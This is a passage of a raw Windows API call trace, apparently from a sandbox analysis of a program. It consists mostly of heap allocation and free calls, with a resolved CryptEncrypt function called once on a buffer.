hHeap=0x25c0000) returned 1 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0256.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.939] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0256.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.939] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.940] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c8fb8 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa908, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.946] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.947] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x11565, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x11568) returned 1 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 